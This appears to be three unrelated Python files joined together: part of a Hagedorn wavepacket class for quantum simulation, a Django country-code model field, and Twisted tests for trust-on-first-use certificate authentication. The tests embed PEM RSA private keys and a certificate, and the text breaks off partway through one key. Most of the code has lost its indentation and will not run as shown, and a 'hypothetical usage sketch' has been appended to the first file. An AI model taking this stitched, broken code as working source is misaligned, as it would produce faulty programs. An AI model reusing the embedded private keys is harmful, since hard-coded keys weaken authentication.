Evaluate the Hagedorn wavepacket :math:`\Psi` at the given nodes :math:`\gamma`.
:param nodes: The nodes :math:`\gamma` at which the Hagedorn wavepacket gets evaluated.
:param component: The index :math:`i` of a single component :math:`\Phi_i` to evaluate. (Defaults to 'None' for evaluating all components.)
:param prefactor: Whether to include a factor of :math:`\left(\det\left(Q\right)\right)^{-\frac{1}{2}}`.
:return: A list of arrays or a single array containing the values of the :math:`\Phi_i` at the nodes :math:`\gamma`.
"""
nodes = nodes.reshape((1,nodes.size))
basis = self.evaluate_basis_at(nodes, component=component, prefactor=prefactor)
phase = exp(1.0j*self.S/self.eps**2)
if component is not None:
values = phase * sum(self.coefficients[component] * basis, axis=0)
else:
# Remember to slice the basis to the correct basis size for each component
values = [ phase * sum(self.coefficients[index] * basis[:self.basis_size[index],:], axis=0) for index in xrange(self.number_components) ]
return values
def get_norm(self, component=None, summed=False):
r"""
Calculate the :math:`L^2` norm of the wavepacket :math:`|\Psi\rangle`.
:param component: The component :math:`\Phi_i` of which the norm is calculated.
:param summed: Whether to sum up the norms of the individual components :math:`\Phi_i`.
:return: A list containing the norms of all components :math:`\Phi_i` or the overall norm of :math:`\Psi`.
"""
if component is not None:
result = norm(self.coefficients[component])
else:
result = [ norm(item) for item in self.coefficients ]
if summed is True:
result = reduce(lambda x,y: x+conj(y)*y, result, 0)
result = sqrt(result)
return result
def potential_energy(self, potential, summed=False):
r"""
Calculate the potential energy :math:`\langle\Psi|V|\Psi\rangle` of the wavepacket componentwise.
:param potential: The potential energy operator :math:`V` as function.
:param summed: Whether to sum up the individual integrals :math:`\langle\Phi_i|V_{i,j}|\Phi_j\rangle`.
:return: The potential energy of the wavepacket's components :math:`\Phi_i` or the overall potential energy of :math:`\Psi`.
"""
f = partial(potential, as_matrix=True)
Q = self.quadrature.quadrature(self, f)
tmp = [ item[0,0] for item in Q ]
N = self.number_components
epot = [ sum(tmp[i*N:(i+1)*N]) for i in xrange(N) ]
if summed is True:
epot = sum(epot)
return epot
def kinetic_energy(self, summed=False):
r"""
Calculate the kinetic energy :math:`\langle\Psi|T|\Psi\rangle` of the wavepacket componentwise.
:param summed: Whether to sum up the individual integrals :math:`\langle\Phi_i|T_{i,j}|\Phi_j\rangle`.
:return: The kinetic energy of the wavepacket's components :math:`\Phi_i` or the overall kinetic energy of :math:`\Psi`.
"""
tmp = [ self.grady(component) for component in xrange(self.number_components) ]
# TODO: Check 0.25 vs orig 0.5!
ekin = [ 0.25*norm(item)**2 for item in tmp ]
if summed is True:
ekin = sum(ekin)
return ekin
def grady(self, component):
r"""
Compute the effect of the operator :math:`-i \varepsilon^2 \frac{\partial}{\partial x}` on the basis
functions of a component :math:`\Phi_i` of the Hagedorn wavepacket :math:`\Psi`.
:param component: The index :math:`i` of the component :math:`\Phi_i` on which we apply the above operator.
:return: The modified coefficients.
"""
sh = array(self.coefficients[component].shape)
c = zeros(sh+1, dtype=complexfloating)
k = 0
c[k] = c[k] + self.p*self.coefficients[component][k]
c[k+1] = c[k+1] + sqrt(k+1)*self.P*sqrt(self.eps**2*0.5)*self.coefficients[component][k]
for k in xrange(1,self.basis_size[component]):
c[k] = c[k] + self.p*self.coefficients[component][k]
c[k+1] = c[k+1] + sqrt(k+1)*self.P*sqrt(self.eps**2*0.5)*self.coefficients[component][k]
c[k-1] = c[k-1] + sqrt(k)*conj(self.P)*sqrt(self.eps**2*0.5)*self.coefficients[component][k]
return c
def project_to_canonical(self, potential, assign=True):
r"""
Project the Hagedorn wavepacket into the canonical basis.
:param potential: The potential :math:`V` whose eigenvectors :math:`\nu_l` are used for the transformation.
:param assign: Whether to assign the new coefficient values to the wavepacket. Default true.
.. note:: This function is expensive and destructive! It modifies the coefficients
of the ``self`` instance if the ``assign`` parameter is True (default).
"""
# No projection for potentials with a single energy level.
# The canonical and eigenbasis are identical here.
if potential.get_number_components() == 1:
return
potential.calculate_eigenvectors()
# Basically an ugly hack to overcome some shortcomings of the matrix function
# and of the data layout.
def f(q, x):
x = x.reshape((self.quadrature.get_qr().get_number_nodes(),))
z = potential.evaluate_eigenvectors_at(x)
result = []
for col in xrange(self.number_components):
for row in xrange(self.number_components):
result.append( z[col][row,:] )
return result
F = transpose(conj(self.quadrature.build_matrix(self, f)))
c = self.get_coefficient_vector()
d = dot(F, c)
if assign is True:
self.set_coefficient_vector(d)
else:
return d
def project_to_eigen(self, potential, assign=True):
r"""
Project the Hagedorn wavepacket into the eigenbasis of a given potential :math:`V`.
:param potential: The potential :math:`V` whose eigenvectors :math:`\nu_l` are used for the transformation.
:param assign: Whether to assign the new coefficient values to the wavepacket. Default true.
.. note:: This function is expensive and destructive! It modifies the coefficients
of the ``self`` instance if the ``assign`` parameter is True (default).
"""
# No projection for potentials with a single energy level.
# The canonical and eigenbasis are identical here.
if potential.get_number_components() == 1:
return
potential.calculate_eigenvectors()
# Basically an ugly hack to overcome some shortcomings of the matrix function
# and of the data layout.
def f(q, x):
x = x.reshape((self.quadrature.get_qr().get_number_nodes(),))
z = potential.evaluate_eigenvectors_at(x)
result = []
for col in xrange(self.number_components):
for row in xrange(self.number_components):
result.append( z[col][row,:] )
return result
F = self.quadrature.build_matrix(self, f)
c = self.get_coefficient_vector()
d = dot(F, c)
if assign:
self.set_coefficient_vector(d)
else:
return d
def to_fourier_space(self, assign=True):
r"""
Transform the wavepacket to Fourier space.
:param assign: Whether to assign the transformation to this packet or return a cloned packet.
.. note:: This is the inverse of the method ``to_real_space()``.
"""
# The Fourier transformed parameters
Pihat = (1.0j*self.Q, -1.0j*self.P, self.S, -self.q, self.p)
# The Fourier transformed coefficients
coeffshat = []
for index in xrange(self.number_components):
k = arange(0, self.basis_size[index]).reshape((self.basis_size[index], 1))
# Compute phase arising from the transformation
phase = (-1.0j)**k * exp(-1.0j*self.p*self.q / self.eps**2)
# Absorb phase into the coefficients
coeffshat.append(phase * self.get_coefficients(component=index))
if assign is True:
self.set_parameters(Pihat)
self.set_coefficients(coeffshat)
else:
FWP = self.clone()
FWP.set_parameters(Pihat)
FWP.set_coefficients(coeffshat)
return FWP
def to_real_space(self, assign=True):
r"""
Transform the wavepacket to real space.
:param assign: Whether to assign the transformation to this packet or return a cloned packet.
.. note:: This is the inverse of the method ``to_fourier_space()``.
"""
# The inverse Fourier transformed parameters
Pi = (1.0j*self.Q, -1.0j*self.P, self.S, self.q, -self.p)
# The inverse Fourier transformed coefficients
coeffs = []
for index in xrange(self.number_components):
k = arange(0, self.basis_size[index]).reshape((self.basis_size[index], 1))
# Compute phase arising from the transformation
phase = (1.0j)**k * exp(-1.0j*self.p*self.q / self.eps**2)
# Absorb phase into the coefficients
coeffs.append(phase * self.get_coefficients(component=index))
if assign is True:
self.set_parameters(Pi)
self.set_coefficients(coeffs)
else:
RWP = self.clone()
RWP.set_parameters(Pi)
RWP.set_coefficients(coeffs)
return RWP
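# Hypothetical usage sketch (not part of the original WaveBlocks sources): build a
# single-component packet in its ground state and evaluate it on a small grid.
# The parameter values below are illustrative only.
if __name__ == "__main__":
    example_params = {"ncomponents": 1, "eps": 0.1, "basis_size": 8}
    packet = HagedornWavepacket(example_params)
    packet.coefficients[0][0, 0] = 1.0   # ground state; set directly for this sketch
    grid = arange(-1.0, 1.0, 0.25)
    values = packet.evaluate_at(grid, prefactor=True)
    print "Psi at the first node:", values[0][0]
    print "Norm of the packet:", packet.get_norm(summed=True)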
|
|
# Code obtained from: http://code.djangoproject.com/attachment/ticket/5446/country_and_language_fields_trunk.2.patch
# Countries list - ISO 3166-1993 (E)
# http://xml.coverpages.org/country3166.html
from django.db.models.fields import CharField
from django.utils.translation import ugettext_lazy as _, ugettext
from django.template.defaultfilters import slugify
from django.core.exceptions import ValidationError
COUNTRIES = [
('AD', _('Andorra')),
('AE', _('United Arab Emirates')),
('AF', _('Afghanistan')),
('AG', _('Antigua & Barbuda')),
('AI', _('Anguilla')),
('AL', _('Albania')),
('AM', _('Armenia')),
('AN', _('Netherlands Antilles')),
('AO', _('Angola')),
('AQ', _('Antarctica')),
('AR', _('Argentina')),
('AS', _('American Samoa')),
('AT', _('Austria')),
('AU', _('Australia')),
('AW', _('Aruba')),
('AZ', _('Azerbaijan')),
('BA', _('Bosnia and Herzegovina')),
('BB', _('Barbados')),
('BD', _('Bangladesh')),
('BE', _('Belgium')),
('BF', _('Burkina Faso')),
('BG', _('Bulgaria')),
('BH', _('Bahrain')),
('BI', _('Burundi')),
('BJ', _('Benin')),
('BM', _('Bermuda')),
('BN', _('Brunei Darussalam')),
('BO', _('Bolivia')),
('BR', _('Brazil')),
('BS', _('Bahama')),
('BT', _('Bhutan')),
('BV', _('Bouvet Island')),
('BW', _('Botswana')),
('BY', _('Belarus')),
('BZ', _('Belize')),
('CA', _('Canada')),
('CC', _('Cocos (Keeling) Islands')),
('CF', _('Central African Republic')),
('CG', _('Congo')),
('CH', _('Switzerland')),
('CI', _('Ivory Coast')),
('CK', _('Cook Islands')),
('CL', _('Chile')),
('CM', _('Cameroon')),
('CN', _('China')),
('CO', _('Colombia')),
('CR', _('Costa Rica')),
('CU', _('Cuba')),
('CV', _('Cape Verde')),
('CX', _('Christmas Island')),
('CY', _('Cyprus')),
('CZ', _('Czech Republic')),
('DE', _('Germany')),
('DJ', _('Djibouti')),
('DK', _('Denmark')),
('DM', _('Dominica')),
('DO', _('Dominican Republic')),
('DZ', _('Algeria')),
('EC', _('Ecuador')),
('EE', _('Estonia')),
('EG', _('Egypt')),
('EH', _('Western Sahara')),
('ER', _('Eritrea')),
('ES', _('Spain')),
('ET', _('Ethiopia')),
('FI', _('Finland')),
('FJ', _('Fiji')),
('FK', _('Falkland Islands (Malvinas)')),
('FM', _('Micronesia')),
('FO', _('Faroe Islands')),
('FR', _('France')),
('FX', _('France, Metropolitan')),
('GA', _('Gabon')),
('GB', _('United Kingdom (Great Britain)')),
('GD', _('Grenada')),
('GE', _('Georgia')),
('GF', _('French Guiana')),
('GH', _('Ghana')),
('GI', _('Gibraltar')),
('GL', _('Greenland')),
('GM', _('Gambia')),
('GN', _('Guinea')),
('GP', _('Guadeloupe')),
('GQ', _('Equatorial Guinea')),
('GR', _('Greece')),
('GS', _('South Georgia and the South Sandwich Islands')),
('GT', _('Guatemala')),
('GU', _('Guam')),
('GW', _('Guinea-Bissau')),
('GY', _('Guyana')),
('HK', _('Hong Kong')),
('HM', _('Heard & McDonald Islands')),
('HN', _('Honduras')),
('HR', _('Croatia')),
('HT', _('Haiti')),
('HU', _('Hungary')),
('ID', _('Indonesia')),
('IE', _('Ireland')),
('IL', _('Israel')),
('IN', _('India')),
('IO', _('British Indian Ocean Territory')),
('IQ', _('Iraq')),
('IR', _('Islamic Republic of Iran')),
('IS', _('Iceland')),
('IT', _('Italy')),
('JM', _('Jamaica')),
('JO', _('Jordan')),
('JP', _('Japan')),
('KE', _('Kenya')),
('KG', _('Kyrgyzstan')),
('KH', _('Cambodia')),
('KI', _('Kiribati')),
('KM', _('Comoros')),
('KN', _('St. Kitts and Nevis')),
('KP', _('Korea, Democratic People\'s Republic of')),
('KR', _('Korea, Republic of')),
('KW', _('Kuwait')),
('KY', _('Cayman Islands')),
('KZ', _('Kazakhstan')),
('LA', _('Lao People\'s Democratic Republic')),
('LB', _('Lebanon')),
('LC', _('Saint Lucia')),
('LI', _('Liechtenstein')),
('LK', _('Sri Lanka')),
('LR', _('Liberia')),
('LS', _('Lesotho')),
('LT', _('Lithuania')),
('LU', _('Luxembourg')),
('LV', _('Latvia')),
('LY', _('Libyan Arab Jamahiriya')),
('MA', _('Morocco')),
('MC', _('Monaco')),
('MD', _('Moldova, Republic of')),
('MG', _('Madagascar')),
('MH', _('Marshall Islands')),
('ML', _('Mali')),
('MN', _('Mongolia')),
('MM', _('Myanmar')),
('MO', _('Macau')),
('MP', _('Northern Mariana Islands')),
('MQ', _('Martinique')),
('MR', _('Mauritania')),
('MS', _('Montserrat')),
('MT', _('Malta')),
('MU', _('Mauritius')),
('MV', _('Maldives')),
('MW', _('Malawi')),
('MX', _('Mexico')),
('MY', _('Malaysia')),
('MZ', _('Mozambique')),
('NA', _('Namibia')),
('NC', _('New Caledonia')),
('NE', _('Niger')),
('NF', _('Norfolk Island')),
('NG', _('Nigeria')),
('NI', _('Nicaragua')),
('NL', _('Netherlands')),
('NO', _('Norway')),
('NP', _('Nepal')),
('NR', _('Nauru')),
('NU', _('Niue')),
('NZ', _('New Zealand')),
('OM', _('Oman')),
('PA', _('Panama')),
('PE', _('Peru')),
('PF', _('French Polynesia')),
('PG', _('Papua New Guinea')),
('PH', _('Philippines')),
('PK', _('Pakistan')),
('PL', _('Poland')),
('PM', _('St. Pierre & Miquelon')),
('PN', _('Pitcairn')),
('PR', _('Puerto Rico')),
('PT', _('Portugal')),
('PW', _('Palau')),
('PY', _('Paraguay')),
('QA', _('Qatar')),
('RE', _('Reunion')),
('RO', _('Romania')),
('RU', _('Russian Federation')),
('RW', _('Rwanda')),
('SA', _('Saudi Arabia')),
('SB', _('Solomon Islands')),
('SC', _('Seychelles')),
('SD', _('Sudan')),
('SE', _('Sweden')),
('SG', _('Singapore')),
('SH', _('St. Helena')),
('SI', _('Slovenia')),
('SJ', _('Svalbard & Jan Mayen Islands')),
('SK', _('Slovakia')),
('SL', _('Sierra Leone')),
('SM', _('San Marino')),
('SN', _('Senegal')),
('SO', _('Somalia')),
('SR', _('Suriname')),
('ST', _('Sao Tome & Principe')),
('SV', _('El Salvador')),
('SY', _('Syrian Arab Republic')),
('SZ', _('Swaziland')),
('TC', _('Turks & Caicos Islands')),
('TD', _('Chad')),
('TF', _('French Southern Territories')),
('TG', _('Togo')),
('TH', _('Thailand')),
('TJ', _('Tajikistan')),
('TK', _('Tokelau')),
('TM', _('Turkmenistan')),
('TN', _('Tunisia')),
('TO', _('Tonga')),
('TP', _('East Timor')),
('TR', _('Turkey')),
('TT', _('Trinidad & Tobago')),
('TV', _('Tuvalu')),
('TW', _('Taiwan, Province of China')),
('TZ', _('Tanzania, United Republic of')),
('UA', _('Ukraine')),
('UG', _('Uganda')),
('UM', _('United States Minor Outlying Islands')),
('US', _('United States of America')),
('UY', _('Uruguay')),
('UZ', _('Uzbekistan')),
('VA', _('Vatican City State (Holy See)')),
('VC', _('St. Vincent & the Grenadines')),
('VE', _('Venezuela')),
('VG', _('British Virgin Islands')),
('VI', _('United States Virgin Islands')),
('VN', _('Viet Nam')),
('VU', _('Vanuatu')),
('WF', _('Wallis & Futuna Islands')),
('WS', _('Samoa')),
('YE', _('Yemen')),
('YT', _('Mayotte')),
('YU', _('Yugoslavia')),
('ZA', _('South Africa')),
('ZM', _('Zambia')),
('ZR', _('Zaire')),
('ZW', _('Zimbabwe')),
]
COUNTRIES.sort(lambda x,y:cmp(slugify(x[1]),slugify(y[1])))
COUNTRIES.append(('ZZ', _('Unknown or unspecified country')))
def isValidCountry(field_data, all_data):
    if field_data not in [country[0] for country in COUNTRIES]:
        raise ValidationError(ugettext("This value must be a country code from the COUNTRIES list in the localflavor.generic package."))
class CountryField(CharField):
def __init__(self, *args, **kwargs):
kwargs.setdefault('max_length', 2)
kwargs.setdefault('choices', COUNTRIES)
super(CountryField, self).__init__(*args, **kwargs)
def get_internal_type(self):
return "CharField"
|
|
from axiom.store import Store
from merlyn import auth
from OpenSSL.crypto import FILETYPE_PEM, load_certificate, load_privatekey
from twisted.python.log import ILogObserver, addObserver, removeObserver
from twisted.test.proto_helpers import StringTransport
from twisted.trial.unittest import SynchronousTestCase
from zope.interface import implementer
from zope.interface.verify import verifyObject
class UserTests(SynchronousTestCase):
def test_emailIndexed(self):
"""The email attribute of the User item is indexed.
"""
self.assertTrue(auth.User.email.indexed)
@implementer(ILogObserver)
class FakeLogObserver(object):
def __init__(self):
self.events = []
def __call__(self, eventDict):
self.events.append(eventDict)
class FakeLogObserverTests(SynchronousTestCase):
def test_interface(self):
"""The fake log observer implements ILogObserver.
"""
self.assertTrue(verifyObject(ILogObserver, FakeLogObserver()))
class TOFUContextFactoryTests(SynchronousTestCase):
"""Tests for TOFU/POP (Trust On First Use/Persistence of Pseudonym)
behavior for the context factory.
"""
def setUp(self):
self.store = Store()
self.user = auth.User(store=self.store, email="[email protected]")
self.ctxFactory = auth._TOFUContextFactory(self.store)
self.observer = FakeLogObserver()
addObserver(self.observer)
self.addCleanup(removeObserver, self.observer)
def _getLogMessage(self):
for e in self.observer.events:
if not e.get("message"):
continue
return e["message"][0]
def test_firstConnection(self):
"""First connections store the digest. Connection succeeds.
"""
verifyResult = self.ctxFactory._verify(None, realUserCert, 0, 0, 0)
self.assertTrue(verifyResult)
self.assertEqual(self.user.digest, realUserCert.digest("sha512"))
message = self._getLogMessage()
self.assertIn("First connection", message)
self.assertIn(self.user.email, message)
self.assertIn(self.user.digest, message)
def test_correctDigest(self):
"""Connection attempts with the correct digest succeed.
"""
self.user.digest = realUserCert.digest("sha512")
verifyResult = self.ctxFactory._verify(None, realUserCert, 0, 0, 0)
self.assertTrue(verifyResult)
message = self._getLogMessage()
self.assertIn("Successful connection", message)
self.assertIn(self.user.email, message)
def test_noSuchEmail(self):
"""Connection attempts for unknown e-mail addresses fail.
"""
verifyResult = self.ctxFactory._verify(None, bogusCert, 0, 0, 0)
self.assertFalse(verifyResult)
message = self._getLogMessage()
self.assertIn("Connection attempt", message)
self.assertIn("by {!r}".format(auth.emailForCert(bogusCert)), message)
self.assertIn("digest was " + bogusCert.digest("sha512"), message)
def test_badDigest(self):
"""Connection attempts with a bad digest fail.
"""
self.user.digest = realUserCert.digest("sha512")
verifyResult = self.ctxFactory._verify(None, impostorCert, 0, 0, 0)
self.assertFalse(verifyResult)
message = self._getLogMessage()
self.assertIn("Failed connection", message)
self.assertIn("digest was " + impostorCert.digest("sha512"), message)
self.assertIn("expecting " + self.user.digest, message)
class UserMixinTests(SynchronousTestCase):
def setUp(self):
self.userMixin = auth.UserMixin()
self.store = self.userMixin.store = Store()
def test_getUser(self):
"""The user mixin gets the user using the peer certificate.
"""
user = auth.User(store=self.store,
email="[email protected]",
digest=realUserCert.digest("sha512"))
self.userMixin.transport = transport = StringTransport()
transport.getPeerCertificate = lambda: realUserCert
self.assertEqual(self.userMixin.user, user)
def test_cache(self):
"""If the ``_user`` cache is primed, it is used.
"""
sentinel = object()
self.userMixin._user = sentinel
self.assertEqual(self.userMixin.user, sentinel)
realUserKey = load_privatekey(FILETYPE_PEM, """
-----BEGIN RSA PRIVATE KEY-----
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
-----END RSA PRIVATE KEY-----
""")
realUserCert = load_certificate(FILETYPE_PEM, """
-----BEGIN CERTIFICATE-----
MIIE8TCCAtkCADANBgkqhkiG9w0BAQ0FADA9MRowGAYDVQQDExFDcnlwdG8gMTAx
IENsaWVudDEfMB0GCSqGSIb3DQEJARYQdXNlckBleGFtcGxlLmNvbTAiGA8yMDEz
MTIxODAwMDAwMFoYDzIwMTgxMjE4MDAwMDAwWjA9MRowGAYDVQQDExFDcnlwdG8g
MTAxIENsaWVudDEfMB0GCSqGSIb3DQEJARYQdXNlckBleGFtcGxlLmNvbTCCAiIw
DQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKZ74kqEdCTxY0mmLN6QeMnANvgj
XL5z6RRTGbHAE8OSfh+Unfj9sWKOVz+zfCo7OkcRcLudH3j6juQV6TJbptChj94U
+4EPbpNlpGlxReRRB8AZDUmvCUx16B6eZ9kFpIf4eRuZUpI35OSM3cyWLCOy1QhZ
0vBRC+K+RDk5t9hAzSEIL9RYZk96wMO7MAFHPfOKGaxm2hgwCabfFnwhWRtJlFNY
WugEm+XbUGdqcbyeWSUXKFe73dp03kjIVCggz60KnZ8B+ue7Ok811hPFZCNKzey2
BbWgkWyPVaEVmcKLK0SYCw70TINyN22l/5UXJGMA5rDa9NtNE30gE/JKhCoXTh9M
5NzqQOyrgIwnVkGTGNQvFdoz2MLnjyH0R2DlCMVkwWpGuijTVmva9pkiwNCHGenX
X3jX+Y9q06wPYfnb5hRLSlDpKcZilFnjSyQXFM/kwYjn8zIDEVBzOgtEkAFaj1VW
WaeXVrfBl+ldsMkK4efOE22BxN5AipqWYWPk2nqEFe6Yt6ENipl9AKPeHnDKhbqi
+FhQAW9Hdb8fJMXz8idBYFPYUjK8ERPhMRq2evVRdETZJ8QWWQ0RMw/RiVZU2Vyz
sd+4vuy27SpmV3mV8Liyib65LVww2kD1Feug1mpqp41EOjZWK3RWOKJkTSEjnE/M
rY0acqHMabfGLZXxAgMBAAEwDQYJKoZIhvcNAQENBQADggIBABnlQWPzqLEqLsFb
5ykb3S3H7x8NJO8ln9xoejkKQj8YxoJbIaAThjCv3gzQbobVkDMTbpStn3AlC8fG
gQHSTfaOl+A41LFo9Y7spKjGRdFGYz7uQY6d5xgHFB+aQ0am5vuAThEp/FxTuCTA
X8JpuTPB8yLJrT7vh3446zx5fPEXhfeRw7h8QdeczgCj2CRzblqcPSplK5FbgOjE
GuefAEmeb2GU60SeLtmtXDcR28ujJrQlQgHk3xSP9Mg/YAVZ+4YnpfuiQmOWXsSA
gRTPiOR+5l47QzDnpJLPlTa+oow/mXPT58Zkimgh60hqfpTShLM0oylubedkKGKn
UvZ5Zv/CACI2epLxDlgZXZcySp+bJradxVdUZPPW/Tmnc2NIZD/gCXLH7YNEDUyv
ZnOh50N7xUg7qrhnr+IloXog+Y5wRQkj76ejuMlPPEOMz2xlnzMIpLEl6b+HkFwT
BWeWlfyzpTWteKMlq/Rw3ghQ2kFhayrckqnaWKNmErK55vZJok4UP+U/ilC4L/ZM
XLZgb39Awni8L9p59ZrK3mn1VbD/l6axff3fj2Db7lb7pcT1ssT2gazgQvPxHEYt
U2fKTgUyO2tWNHed2PCKSJ6F6rpG4RRcN53BTnOo27b38NrZnx06bh9OUW3Ws5Qf
43YN/h7UXI5gAnnHR4fgkR0H8prK
-----END CERTIFICATE-----
""")
impostorKey = load_privatekey(FILETYPE_PEM, """
-----BEGIN RSA PRIVATE KEY-----
MIIJKgIBAAKCAgEAvmcckrGyAMGlAwpp6uPQz2TyUMlYBiNZNyTldiWw3aC81c4r
Z+X+JfsAp1Iwb2odlizEUBqRnN/ydqqTKFcJmF0JDMtMoX56+PzS/yYwHsTWUyIY
TxTgPqr/cYSRtKzVP+EhbOFwqeg5ncdpmfh1+bixbNZ19wrKi85r0+laGvUmhVkb
c453OgwYt/JOdH+lfkCelyYQq6xbj/HMhhzxKxZP3CqFBnLAS3r2WUZUHK/vxvbX
2GdlvBukBnhICp+BlzIkBlNyWlO5qaK/RIK8/NvCcQUmEJUUJnJfPoR9k2LtujkO
488aZLfQ6vgEXb8wPnCv6UxUM/UixeeuakJrlxYVEhQ9om/Tk75oi+4yyKl/B3vm
KqZQuW0HNF4UhJX86heW36QzWLsuLmg3gkLTxJmkPWgGMbSZaj3DVHF78LQpMDeg
AbCrT+UB6yqtodhn2NPrKUTU8j8YEScW7RFiMDMnbQcI557h5GlJC938Ytrqpjcr
VdPphhb0rCmdb3nf9b8UfJVuLS7cc2tt3OOt8IU42cbK7pPAt7+uHTG0RcJrjMkS
wteQD2a+VPOUDZXogYoo+oNiJZpVUprBb/6zwqStBxOAqqz8vROq9SFeSnSZJTQY
7X6BqgeGzT27Is1U4UOFTpUp30HiJ9KXVX6fp8SNj82qBLt8qbtsEUUVRLECAwEA
AQKCAgAS0UP8p30tH/Y797KCGWPQq2xbWZrOeH3fulDHPXBeZv1isA6QJSXaARWO
c8v/puAnsGLye726YFOpMLB8gyWank8/qXP4XfSvWOVNfCuzTsbTzoHShwCmkOXQ
BUcVMSOePZS9Gwa0dBQFqOih4/Fc7cjzNbrQ4IsmCA+WEPDryyC0exsAb6sO3JUw
0My6LMdhU+eYjpWFMfKWplINSxz2oizgWH9vJLYmf4+LQS0c7LJo2op4g7eFQMIU
